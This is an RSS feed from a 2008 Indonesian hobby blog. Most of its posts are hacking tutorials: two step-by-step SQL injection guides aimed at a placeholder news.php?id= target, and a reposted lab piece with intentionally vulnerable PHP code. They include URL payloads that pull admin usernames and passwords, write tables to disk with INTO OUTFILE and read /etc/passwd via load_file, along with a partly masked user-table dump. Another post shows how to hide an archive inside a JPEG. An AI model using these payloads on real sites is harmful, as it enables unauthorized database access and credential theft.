<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Andi Live Is Here</title>
	<atom:link href="http://andi.lp3i.net/feed/" rel="self" type="application/rss+xml" />
	<link>http://andi.lp3i.net</link>
	<description>My Live Is My Future</description>
	<pubDate>Thu, 10 Jul 2008 01:39:36 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5.1</generator>
	<language>en</language>
			<item>
		<title>Sembunyikan File</title>
		<link>http://andi.lp3i.net/2008/07/08/sembunyikan-file/</link>
		<comments>http://andi.lp3i.net/2008/07/08/sembunyikan-file/#comments</comments>
		<pubDate>Tue, 08 Jul 2008 07:28:06 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
		
		<category><![CDATA[Tutorial]]></category>

		<guid isPermaLink="false">http://andi.lp3i.net/?p=27</guid>
		<description><![CDATA[Perintah ini memeng unik, dan mudah, gue aja baru tau.
Ok langsung aja, kita ambil contoh file gambar.jpg dengan dataku.zip di dalam folder data
buka command prompt, ketik perintah
C:\data&#62;copy /b gambar.jpg + dataku.zip dodol.jpg
gambar.jpg
dataku.zip
1 file(s) copied.
Kita lihat lagi di dalam folder, ada penambahan file dodol.jpg dengan tampilan sama dengan gambar.jpg, tetapi berbeda besar filenya.
File yang pertama adalah [...]]]></description>
			<content:encoded><![CDATA[<p>Perintah ini memeng unik, dan mudah, gue aja baru tau.</p>
<p>Ok langsung aja, kita ambil contoh file gambar.jpg dengan dataku.zip di dalam folder data</p>
<p>buka command prompt, ketik perintah</p>
<p>C:\data&gt;copy /b gambar.jpg + dataku.zip dodol.jpg<br />
gambar.jpg<br />
dataku.zip<br />
1 file(s) copied.</p>
<p>Kita lihat lagi di dalam folder, ada penambahan file dodol.jpg dengan tampilan sama dengan gambar.jpg, tetapi berbeda besar filenya.</p>
<p>File yang pertama adalah file yang akan di masukan file yang lain</p>
<p>Sedangkan File Yang kedua adalah file yang akan dimasukan</p>
<p>File yang di masukan dan file yang akan dimasukan tidak harus file gambar atau jpg dan zip, tetapi bebas apa saja, yang penting dia FIle bukannya ember atau baskom.</p>
<p>Oh iya&#8230; kalo mau buka file yang di sisipkan atau di masukan menggunakan program aslinya</p>
<p>Contoh yang  dimasukan file zip buka dengan software zip.</p>
]]></content:encoded>
			<wfw:commentRss>http://andi.lp3i.net/2008/07/08/sembunyikan-file/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Sql Injection Ver. 5</title>
		<link>http://andi.lp3i.net/2008/07/07/sql-injection-ver-5/</link>
		<comments>http://andi.lp3i.net/2008/07/07/sql-injection-ver-5/#comments</comments>
		<pubDate>Mon, 07 Jul 2008 09:25:29 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
		
		<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://andi.lp3i.net/?p=26</guid>
		<description><![CDATA[Untuk mencari ada atau tidak bugnya sebenernya ada di artikel sebelumnya, juga standar pencarian union, gue cuma nambahin sedikit aja, jadi gue copy paste aje ye  
1.) Cek Kutu
Misalkan kita mendapatkan target
http://www.target.com/news.php?id=5
Sekarang kita test ada kutunya g tuh website dengan menambahkan di url&#8217;
contoh http://www.target.com/news.php?id=5&#8242;
maka akan muncul error
“You have an error in your SQL syntax; [...]]]></description>
			<content:encoded><![CDATA[<p>Untuk mencari ada atau tidak bugnya sebenernya ada di artikel sebelumnya, juga standar pencarian union, gue cuma nambahin sedikit aja, jadi gue copy paste aje ye <img src='http://andi.lp3i.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>1.) Cek Kutu</p>
<p>Misalkan kita mendapatkan target</p>
<p>http://www.target.com/news.php?id=5</p>
<p>Sekarang kita test ada kutunya g tuh website dengan menambahkan di url&#8217;</p>
<p>contoh http://www.target.com/news.php?id=5&#8242;</p>
<p>maka akan muncul error</p>
<p>“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”</p>
<p>Atau Yang mendekati</p>
<p>Itu berarti kita bisa gunakan Sql Injection</p>
<p>2). Mencari nomor dari kolom</p>
<p>Untuk mencari nomor dari kolom kita menggunakan perintah ORDER BY</p>
<p>Kita melakukan perurutan nomor sampai ada error</p>
<p>http://www.target.com/news.php?id=5+order+by+1/* &lt;– no error</p>
<p>http://www.target.com/news.php?id=5+order+by+2/* &lt;– no error</p>
<p>http://www.target.com/news.php?id=5+order+by+3/* &lt;– no error</p>
<p>http://www.target.com/news.php?id=5+order+by+4/* &lt;– error (kita akan mendapatkan pesan seperti Unknown column &#8216;4&#8242; in ‘order clause&#8217; atau sesuatu seperti itu…ya gitu degh <img class="wp-smiley" src="../wp-includes/images/smilies/icon_sad.gif" alt=":(" /> )</p>
<p>Berarti kita mendapatkan kolomnya, ya itu 3,  karena di 4 error.</p>
<p>Sedikit penjelasan, dalam penggunaan ORDER BY kita mencari pertemuan dimana website itu menjadi error dan tidak, setelah itu mendapatkannya, kita ambil yg tidak erorr terakhir sebelum keluar error.</p>
<p>3). Menggunakan fungsi UNION</p>
<p>Dengan menggunakan UNION kita dapat memilih lebih banyak data dalam satu statemen sql.</p>
<p>Jadi kita mendapatkan</p>
<p>http://www.target.com/news.php?id=5+UNION+SELECT+1,2,3/* (kita telah menemukan bahwa nomor dari kolom-kolom adalah 3 di dalam bagian 2)</p>
<p>Sekarang lihat pada artikel, artikelnya akan berubah jadi nomor 1 atau 2 atau 3 atau keluar semuanya, itu lah gunanya UNION</p>
<p>4). Check versi dari MySQL</p>
<p>http://www.target.com/news.php?id=5+union+select+1,2,3/*</p>
<p>NOTE: jika /* tidak bisa atau terjadi error, coba dengan –</p>
<p>ini merupakan suatu komentar penting bagi query kita untuk bekerja dengan baik.</p>
<p>Misalkan kita mendapatkan nomor 2 di dalam tampilan, sekarang kita cek verisinya</p>
<p>kita buang nomor 2, ganti dengan version() atau @@version nanti akan mendapatkan seperti 4.1.33-log atau 5.0.45 atau yang mendekati.</p>
<p>Contoh tampilan : http://www.target.com/news.php?id=5+union+select+1,@@version,3/*</p>
<p>Jika kamu mendapatkan error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”</p>
<p>Yang kita butuhkan adalah fungsi convert()</p>
<p>contoh :</p>
<p>http://www.target.com/news.php?id=5+union+select+1,convert(@@version+using+latin1),3/*</p>
<p>atau dengan hex() dan unhex()</p>
<p>contoh :</p>
<p>http://www.target.com/news.php?id=5+union+all+select+1,unhex(hex(@@version)),3/*</p>
<p>dan kamu akan mendapatan versi MySql <img class="wp-smiley" src="../wp-includes/images/smilies/icon_biggrin.gif" alt=":D" /></p>
<p>5). Mendapatkan table dan nama column</p>
<p>Jika versi MySQL adalah 5 (contoh : 5.0.45,                  5.0.51a-community…)</p>
<p>&#8211; Mencari Table</p>
<p>Contoh Nomor yang keluar ada 2, jadi kita masukan perintah injekan di nomor 2</p>
<p>http://www.target.com/news.php?id=5+union+select+1,table_name,3+from+information_schema.tables+where+table_schema=database()+limit+0,1/*</p>
<p>Untuk melihat table selanjutnya kita rubah limit+0,1/* menjadi limit+1,1/* lalu limit+2,1/* dst.</p>
<p>Sampai tabel yang dinginkan, contoh table admin</p>
<p>&#8211; Mencari Column</p>
<p>Sekarang kita cari column pada table admin</p>
<p>http://www.target.com/news.php?id=5+union+select+1,column_name,3+from+information_schema.columns+where+table_name=&#8217;admin&#8217;+limit+0,1/*</p>
<p>Setandarnya bisa menggunakan itu jika quotenya off, tetapi jika quote on nama table harus di encode dengan hexa</p>
<p>admin = 61646D696E</p>
<p>Untuk dapat di baca oleh perintah SQL, harus di tambahakan 0x sihingga menjadi 0&#215;61646D696E</p>
<p>http://www.target.com/news.php?id=5+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0&#215;61646D696E+limit+0,1/*</p>
<p>Untuk melihat colum selanjutnya tinggal merubah limitnya seperti table diatas.</p>
<p>Contoh column yang keluar username dan password</p>
<p>Sekarang kita lihat datanya <img src='http://andi.lp3i.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>http://www.target.com/news.php?id=5+union+select+1,username,3+from+admin/*</p>
<p>Contoh data yang keluar : admin</p>
<p>http://www.target.com/news.php?id=5+union+select+1,password,3+from+admin/*</p>
<p>Contoh data yang keluar : p45w0rd</p>
<p>sekarang kita harus menyelesaikan query biar terlihat bagus <img class="wp-smiley" src="../wp-includes/images/smilies/icon_smile.gif" alt=":)" /></p>
<p>untuk itu kita menggunakan fungsi concat() (merupakan penggabungan strings)</p>
<p>contoh :</p>
<p>http://www.target.com/news.php?id=5+union+all+select+1,concat(username,0×3a,password),3+from+admin/*</p>
<p>catatan : 0×3a, adalah nilai hex dari 3a, sedangkan 0x merupakan tambahan untuk dapat di baca oleh URL</p>
<p>(ada cara lain untuk itu dengan menggunakan, char(58), merupakan dari nilai decimal )</p>
<p>http://www.target.com/news.php?id=5+union+all+select+1,concat(username,char(58),password),3+from+admin/*</p>
<p>Maka akan muncul tampilan data : admin:p45w0rd</p>
<p>Untuk mengencrypt bisa dari link di bawah ini</p>
<p><a title="Ascii Encrypter" href="../tools/asci.htm" target="_blank">http://andi.lp3i.net/tools/asci.htm</a></p>
]]></content:encoded>
			<wfw:commentRss>http://andi.lp3i.net/2008/07/07/sql-injection-ver-5/feed/</wfw:commentRss>
		</item>
		<item>
		<title>SQL Injection Kumplit</title>
		<link>http://andi.lp3i.net/2008/06/12/sql-injection-kumplit/</link>
		<comments>http://andi.lp3i.net/2008/06/12/sql-injection-kumplit/#comments</comments>
		<pubDate>Thu, 12 Jun 2008 08:32:44 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
		
		<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://andi.lp3i.net/?p=25</guid>
		<description><![CDATA[Hihihihii&#8230; gue rubah judul doang, aslinya sih tetep sql injection  
1.) Cek Kutu
Misalkan kita mendapatkan target
http://www.target.com/news.php?id=5
Sekarang kita test ada kutunya g tuh website dengan menambahkan di url &#8216;
contoh http://www.target.com/news.php?id=5&#8242;
maka akan muncul error
&#8220;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc&#8230;&#8221;
Atau Yang [...]]]></description>
			<content:encoded><![CDATA[<p>Hihihihii&#8230; gue rubah judul doang, aslinya sih tetep sql injection <img src='http://andi.lp3i.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>1.) Cek Kutu</p>
<p>Misalkan kita mendapatkan target</p>
<p>http://www.target.com/news.php?id=5</p>
<p>Sekarang kita test ada kutunya g tuh website dengan menambahkan di url &#8216;</p>
<p>contoh http://www.target.com/news.php?id=5&#8242;</p>
<p>maka akan muncul error</p>
<p>&#8220;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc&#8230;&#8221;</p>
<p>Atau Yang mendekati</p>
<p>Itu berarti kita bisa gunakan Sql Injection</p>
<p>2). Mencari nomor dari kolom</p>
<p>Untuk mencari nomor dari kolom kita menggunakan perintah ORDER BY</p>
<p>Kita melakukan perurutan nomor sampai ada error</p>
<p>http://www.target.com/news.php?id=5+order+by+1/* &lt;&#8211; no error</p>
<p>http://www.target.com/news.php?id=5+order+by+2/* &lt;&#8211; no error</p>
<p>http://www.target.com/news.php?id=5+order+by+3/* &lt;&#8211; no error</p>
<p>http://www.target.com/news.php?id=5+order+by+4/* &lt;&#8211; error  (kita akan mendapatkan pesan seperti Unknown column &#8216;4&#8242; in &#8216;order clause&#8217; atau sesuatu seperti itu&#8230;ya gitu degh <img src='http://andi.lp3i.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> )</p>
<p>Berarti kita mendapatkan kolomnya, ya itu 3,  karena di 4 error.</p>
<p>Sedikit penjelasan, dalam penggunaan ORDER BY kita mencari pertemuan dimana website itu menjadi error dan tidak, setelah itu mendapatkannya, kita ambil yg tidak erorr terakhir sebelum keluar error.</p>
<p>3). Menggunakan fungsi UNION</p>
<p>Dengan menggunakan UNION kita dapat memilih lebih banyak data dalam satu statemen sql.</p>
<p>Jadi kita mendapatkan</p>
<p>http://www.target.com/news.php?id=5+UNION+SELECT+1,2,3/* (kita telah menemukan bahwa nomor dari kolom-kolom adalah 3 di dalam bagian 2)</p>
<p>Sekarang lihat pada artikel, artikelnya akan berubah jadi nomor 1 atau 2 atau 3 atau keluar semuanya, itu lah gunanya UNION</p>
<p>4). Check versi dari MySQL</p>
<p>http://www.target.com/news.php?id=5+union+select+1,2,3/*</p>
<p>NOTE: jika /* tidak bisa atau terjadi error, coba dengan &#8211;</p>
<p>ini merupakan suatu komentar penting bagi query kita untuk bekerja dengan baik.</p>
<p>Misalkan kita mendapatkan nomor 2 di dalam tampilan, sekarang kita cek verisinya</p>
<p>kita buang nomor 2, ganti dengan version() atau @@version nanti akan mendapatkan seperti 4.1.33-log atau 5.0.45 atau yang mendekati.</p>
<p>Contoh tampilan : http://www.target.com/news.php?id=5+union+select+1,@@version,3/*</p>
<p>Jika kamu mendapatkan error &#8220;union + illegal mix of collations (IMPLICIT + COERCIBLE) &#8230;&#8221;</p>
<p>Yang kita butuhkan adalah fungsi convert()</p>
<p>contoh :</p>
<p>http://www.target.com/news.php?id=5+union+select+1,convert(@@version+using+latin1),3/*</p>
<p>atau dengan hex() dan unhex()</p>
<p>contoh :</p>
<p>http://www.target.com/news.php?id=5+union+all+select+1,unhex(hex(@@version)),3/*</p>
<p>dan kamu akan mendapatan versi MySql <img src='http://andi.lp3i.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>5). Mendapatkan table dan nama column</p>
<p>Jika versi MySQL adalah &lt; 5 (contoh : 4.1.33, 4.1.12&#8230;) &lt;&#8212; nanti saya akan menerangkan untuk MySQL &gt; 5 version.</p>
<p>kita harus menebak table dan nama column menurut perkiraan.</p>
<p>jika nama tablenya: user/s, admin/s, member/s &#8230;</p>
<p>jika nama kolomnya: username, user, usr, user_name, password, pass, passwd, pwd etc&#8230;</p>
<p>contohnya seperti</p>
<p>http://www.target.com/news.php?id=5+union+all+select+1,2,3+from+admin/* (jika kita melihat nomor dua ditampilan, berarti benar table tersebut)</p>
<p>kita tahu tablenya adalah admin&#8230;</p>
<p>sekarang kita cek nama column.</p>
<p>http://www.target.com/news.php?id=5+union+all+select+1,username,3+from+admin/* (jika yang keluarnya error, coba nama column yang lain)</p>
<p>kita mendapatkan tampilan username, contohnya seperti admin, atau superadmin dll&#8230;</p>
<p>sekarang kita cek column password ada apa tidak</p>
<p>http://www.target.com/news.php?id=5+union+all+select+1,password,3+from+admin/* (jika kamu mendapatkan error, coba nama column yang lain)</p>
<p>kita melihat password di tampilan dalam bentuk hash atau plain-text, itu tergantung dari isi database</p>
<p>contoh md5 hash, mysql hash, sha1&#8230;</p>
<p>sekarang kita harus menyelesaikan query biar terlihat bagus <img src='http://andi.lp3i.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>untuk itu kita menggunakan fungsi concat() (merupakan penggabungan strings)</p>
<p>contoh :</p>
<p>http://www.target.com/news.php?id=5+union+all+select+1,concat(username,0&#215;3a,password),3+from+admin/*</p>
<p>catatan : 0&#215;3a, adalah nilai hex dari 3a, sedangkan 0x merupakan tambahan untuk dapat di baca oleh URL</p>
<p>(ada cara lain untuk itu dengan menggunakan, char(58), merupakan dari nilai decimal )</p>
<p>http://www.target.com/news.php?id=5+union+all+select+1,concat(username,char(58),password),3+from+admin/*</p>
<p>URL encrypt di</p>
<p><a title="Ascii Encrypter" href="http://andi.lp3i.net/tools/asci.htm" target="_blank">http://andi.lp3i.net/tools/asci.htm</a></p>
<p>sekarang kita mendapatkan username:password di tampilan, contoh admin:admin atau admin:somehash</p>
<p>jika kamu mendapatkan itu, kamu bisa login sebagai admin atau superuser <img src='http://andi.lp3i.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>jika tidak dapat menebak nama table, kamu bisa selalu mencoba mysql.user (default)</p>
<p>sedangkan columnya user dan password, jadi contohnya seperti</p>
<p>http://www.target.com/news.php?id=5+union+all+select+1,concat(user,0&#215;3a,password),3+from+mysql.user/*</p>
<p>Cukup sudah untuk bagian ini, sekarang kita masuk bagian yang susah</p>
<p>Tapi bersambung ya, tungguin aja mungkin tahun depan <img src='http://andi.lp3i.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /></p>
]]></content:encoded>
			<wfw:commentRss>http://andi.lp3i.net/2008/06/12/sql-injection-kumplit/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Link Download Naruto Shippuuden</title>
		<link>http://andi.lp3i.net/2008/05/28/link-download-naruto-shippuuden/</link>
		<comments>http://andi.lp3i.net/2008/05/28/link-download-naruto-shippuuden/#comments</comments>
		<pubDate>Wed, 28 May 2008 04:10:51 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
		
		<category><![CDATA[Curhat]]></category>

		<guid isPermaLink="false">http://andi.lp3i.net/?p=24</guid>
		<description><![CDATA[Akhirnya ada juga tempat link download naruto Shippuuden, geratis lagi  
ini link untuk downloadnya, enjoy.
http://blog.prentisproject.info/naruto/index.php?statpos=1
http://www.adc-distro.com/index.php?ses=562&#38;page=Naruto
]]></description>
			<content:encoded><![CDATA[<p>Akhirnya ada juga tempat link download naruto Shippuuden, geratis lagi <img src='http://andi.lp3i.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>ini link untuk downloadnya, enjoy.</p>
<p>http://blog.prentisproject.info/naruto/index.php?statpos=1</p>
<p>http://www.adc-distro.com/index.php?ses=562&amp;page=Naruto</p>
]]></content:encoded>
			<wfw:commentRss>http://andi.lp3i.net/2008/05/28/link-download-naruto-shippuuden/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Php Injection In Action</title>
		<link>http://andi.lp3i.net/2008/05/21/php-injection-in-action/</link>
		<comments>http://andi.lp3i.net/2008/05/21/php-injection-in-action/#comments</comments>
		<pubDate>Wed, 21 May 2008 00:56:03 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
		
		<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://andi.lp3i.net/2008/05/21/php-injection-in-action/</guid>
		<description><![CDATA[-== WEB HACKING IN ACTION PART I==-
PHP - MYSQL : SQL INJECTION
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-
(Dumping MySQL Database)
CREATE TABLE `userlist` (
`id` tinyint(6) NOT NULL auto_increment,
`username` varchar(28) NOT NULL,
`status` varchar(28) NOT NULL,
`password` varchar(48) NOT NULL,
`creation_date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
`nama_lengkap` varchar(128) NOT NULL,
`status_id` tinyint(6) NOT NULL,
PRIMARY KEY  (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ;
&#8211;
&#8211; Dumping data for [...]]]></description>
			<content:encoded><![CDATA[<p>-== WEB HACKING IN ACTION PART I==-</p>
<p>PHP - MYSQL : SQL INJECTION<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>(Dumping MySQL Database)</p>
<p>CREATE TABLE `userlist` (<br />
`id` tinyint(6) NOT NULL auto_increment,<br />
`username` varchar(28) NOT NULL,<br />
`status` varchar(28) NOT NULL,<br />
`password` varchar(48) NOT NULL,<br />
`creation_date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,<br />
`nama_lengkap` varchar(128) NOT NULL,<br />
`status_id` tinyint(6) NOT NULL,<br />
PRIMARY KEY  (`id`)<br />
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ;</p>
<p>&#8211;<br />
&#8211; Dumping data for table `userlist`<br />
&#8211;</p>
<p>INSERT INTO `userlist` (`id`, `username`, `status`, `password`, `creation_date`, `nama_lengkap`, `status_id`) VALUES<br />
(1, &#8216;anxx&#8217;, &#8216;administrator&#8217;, &#8216;8a1465884c097cfa30e332c57exxxxxx&#8217;, &#8216;2007-05-15 21:18:08&#8242;, &#8216;anxxx nightlogin&#8217;, 1),<br />
(2, &#8216;kaxxxx&#8217;, &#8216;operator&#8217;, &#8216;8a1465884c097cfa30e332c57xxxxxx&#8217;, &#8216;2007-05-04 21:18:31&#8242;, &#8216;kaxxxx poseidon&#8217;, 2),<br />
(3, &#8216;bxxx&#8217;, &#8216;operator&#8217;, &#8216;b3f85374ebbdb228c0ad76cd6axxxxxx&#8217;, &#8216;2007-05-04 16:51:32&#8242;, &#8216;Bxxx Erlangga&#8217;, 2),<br />
(4, &#8216;haxxx&#8217;, &#8216;operator&#8217;, &#8216;daa526517139536f056efbb8exxxxxx&#8217;, &#8216;2007-05-04 20:13:31&#8242;, &#8216;Haxxx pekok&#8217;, 2);</p>
<p>#############<br />
# SEKENARIO 1<br />
#############</p>
<p>&lt;?php<br />
$host=&#8221;localhost&#8221;;<br />
$user=&#8221;xx&#8221;;<br />
$passwd=&#8221;xxx&#8221;;<br />
$dbname=&#8221;e-register&#8221;;<br />
if(!isset($_GET['id']) OR empty($_GET['id']))<br />
{<br />
die(&#8221;Error ndan!!&#8221;);<br />
}</p>
<p>$dbid=$_GET['id'];<br />
$conid=mysql_connect($host,$user,$passwd) or die(mysql_error());<br />
mysql_select_db($dbname,$conid) or die(mysql_error());<br />
$query=&#8221;SELECT * FROM userlist WHERE id=&#8217;$dbid&#8217;&#8221;;<br />
$res=mysql_query($query) or die(mysql_error());<br />
$row=mysql_fetch_object($res);<br />
if(!$row){<br />
die(mysql_error());<br />
}<br />
echo &#8220;Nama : &#8220;.$row-&gt;nama_lengkap.&#8221;&lt;br&gt;&#8221;;<br />
echo &#8220;Username : &#8220;.$row-&gt;username.&#8221;&lt;br&gt;&#8221;;<br />
echo &#8220;Status :&#8221;.$row-&gt;status.&#8221;&lt;br&gt;&#8221;;<br />
echo &#8220;\n&#8221;;</p>
<p>?&gt;</p>
<p>Eksploitasi:</p>
<p>http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2&#8242; and &#8216;a&#8217;='a<br />
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2&#8242; union select 1,1,1,1,1,1,1/*<br />
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=-1&#8242;%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1/*<br />
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2&#8242;%20union%20select%20*%20from%20userlist%20into%20outfile%20&#8242;/var/www/users/kaiten/PENTEST/db.txt<br />
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=1&#8242;%20union%20select%201,1,1,1,1,1,load_file(&#8217;/etc/passwd&#8217;)%20into%20outfile%20&#8242;/var/www/users/kaiten/PENTEST/pwdx.txt&#8217;/*</p>
<p>#############<br />
# SEKENARIO 2<br />
#############</p>
<p>&lt;?php<br />
$host=&#8221;localhost&#8221;;<br />
$user=&#8221;xx&#8221;;<br />
$passwd=&#8221;xxx&#8221;;<br />
$dbname=&#8221;e-register&#8221;;<br />
if(!isset($_GET['id']) OR empty($_GET['id']))<br />
{<br />
die(&#8221;Error ndan!!&#8221;);<br />
}</p>
<p>$dbid=$_GET['id'];<br />
$conid=mysql_connect($host,$user,$passwd) or die(mysql_error());<br />
mysql_select_db($dbname,$conid) or die(mysql_error());<br />
$query=&#8221;SELECT * FROM userlist WHERE id=$dbid&#8221;;<br />
$res=mysql_query($query) or die(mysql_error());<br />
$row=mysql_fetch_object($res);<br />
if(!$row){<br />
die(mysql_error());<br />
}<br />
echo &#8220;Nama : &#8220;.$row-&gt;nama_lengkap.&#8221;&lt;br&gt;&#8221;;<br />
echo &#8220;Username : &#8220;.$row-&gt;username.&#8221;&lt;br&gt;&#8221;;<br />
echo &#8220;Status :&#8221;.$row-&gt;status.&#8221;&lt;br&gt;&#8221;;<br />
echo &#8220;\n&#8221;;<br />
?&gt;</p>
<p>Eksploitasi:</p>
<p>http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 and 1=0<br />
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 union select 1,1,1,1,1,1,1<br />
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=-1%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1<br />
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2%20union%20select%20*%20from%20userlist%20into%20outfile%20&#8242;/var/www/users/kaiten/PENTEST/db.txt&#8217;<br />
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=1%20union%20select%201,1,1,1,1,1,load_file(&#8217;/etc/passwd&#8217;)%20into%20outfile%20&#8242;/var/www/users/kaiten/PENTEST/pwd.txt&#8217;</p>
<p>#############<br />
# SEKENARIO 3<br />
#############</p>
<p>&lt;?php<br />
$host=&#8221;localhost&#8221;;<br />
$user=&#8221;xx&#8221;;<br />
$passwd=&#8221;xxx&#8221;;<br />
$dbname=&#8221;e-register&#8221;;<br />
if(!isset($_GET['id']) OR empty($_GET['id']))<br />
{<br />
die(&#8221;Error ndan!!&#8221;);<br />
}</p>
<p>$dbid=$_GET['id'];<br />
$conid=mysql_connect($host,$user,$passwd) or die(mysql_error());<br />
mysql_select_db($dbname,$conid) or die(mysql_error());<br />
$query=&#8221;SELECT * FROM userlist WHERE (id=&#8217;$dbid&#8217;)&#8221;;<br />
$res=mysql_query($query) or die(mysql_error());<br />
$row=mysql_fetch_object($res);<br />
if(!$row){<br />
die(mysql_error());<br />
}<br />
echo &#8220;Nama : &#8220;.$row-&gt;nama_lengkap.&#8221;&lt;br&gt;&#8221;;<br />
echo &#8220;Username : &#8220;.$row-&gt;username.&#8221;&lt;br&gt;&#8221;;<br />
echo &#8220;Status :&#8221;.$row-&gt;status.&#8221;&lt;br&gt;&#8221;;<br />
echo &#8220;\n&#8221;;</p>
<p>?&gt;</p>
<p>Eksploitasi:</p>
<p>http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=1&#8242;)%20and%201=1/*<br />
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2&#8242;) union select 1,1,1,1,1,1,1/*<br />
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=-1&#8242;)%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=2/*<br />
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2&#8242;)%20union%20select%20*%20from%20userlist%20into%20outfile%20&#8242;/var/www/users/kaiten/PENTEST/db.txt&#8217;/*</p>
<p>Note :<br />
/var/www/users/kaiten/PENTEST/ is world writeable (permission 777)<br />
magic_quotes_gpc = Off<br />
I&#8217;a really lamme in SQL injection :((<br />
Author : Ph03n1X<br />
URL : http://kandangjamur.net</p>
<p>NB From Me :</p>
<p>Kalo ada kesalahan dalam artikel yang ini, coba buka yg di bawah ini <img src='http://andi.lp3i.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p><a href="http://andi.lp3i.net/tools/sql-inject.txt" title="Apa Lo Liat - Liat">http://andi.lp3i.net/tools/sql-inject.txt</a></p>
]]></content:encoded>
			<wfw:commentRss>http://andi.lp3i.net/2008/05/21/php-injection-in-action/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
